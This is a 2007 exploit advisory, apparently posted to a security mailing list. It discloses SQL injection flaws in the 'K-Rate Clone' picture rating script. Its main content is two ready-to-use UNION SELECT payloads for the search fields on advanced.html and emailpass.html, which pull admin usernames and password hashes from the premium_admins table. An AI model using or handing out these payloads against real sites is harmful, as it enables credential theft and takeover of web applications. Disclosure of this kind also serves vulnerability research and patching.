evening ppl. 

[~]----------------------------------------------------------------
[~] K-Rate Clone  Multiple Sql Injection
[~]  
[~] (advanced picture rating script)
[~]
[~] Vendor http://turn-k.net/k-rate  
[~] ----------------------------------------------------------------
[~] Bug founded by d3v1l
[~]  
[~] Date: 12.09.2007 
[~]
[~] 
[~] Contact:stylers1@hotmail.uk
[~] 
[~] -----------------------------------------------------------------
[~] Greetz tO:- All Members of PLDsecurity
[~]   
[~] http://www.pldsecurity.de/forum
[~]   
[~] Thanks :- | M4k3 | Pentest | Str0ke |
[~]-------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://www.site.com/advanced.html     Advanced Search
[~]     
[~] The following proof-of-concept search-field data is available :-  
[~] 
[~] -1'union select 1,2,3,4,5,6,7,8,9,10,11,12,adm_user,adm_pass,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0   [~] from premium_admins/*
[~] 
[~] Search Results: admin passwd hash
[~]--------------------------------------------------------------------
[~] http://www.site.com/emailpass.html
[~]  
[~] The following proof-of-concept search-field data is available :- 
[~] 
[~] -1'union select 1,2,3,concat(adm_user,':',adm_pass),5,6,7,8,9,10,11,12,13,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from premium_admins/*
[~]--------------------------------------------------------------------

thanks and sorry for the trouble


/d3v1l

_________________________________________________________________
Sai cosa è successo oggi?
http://notizie.msn.it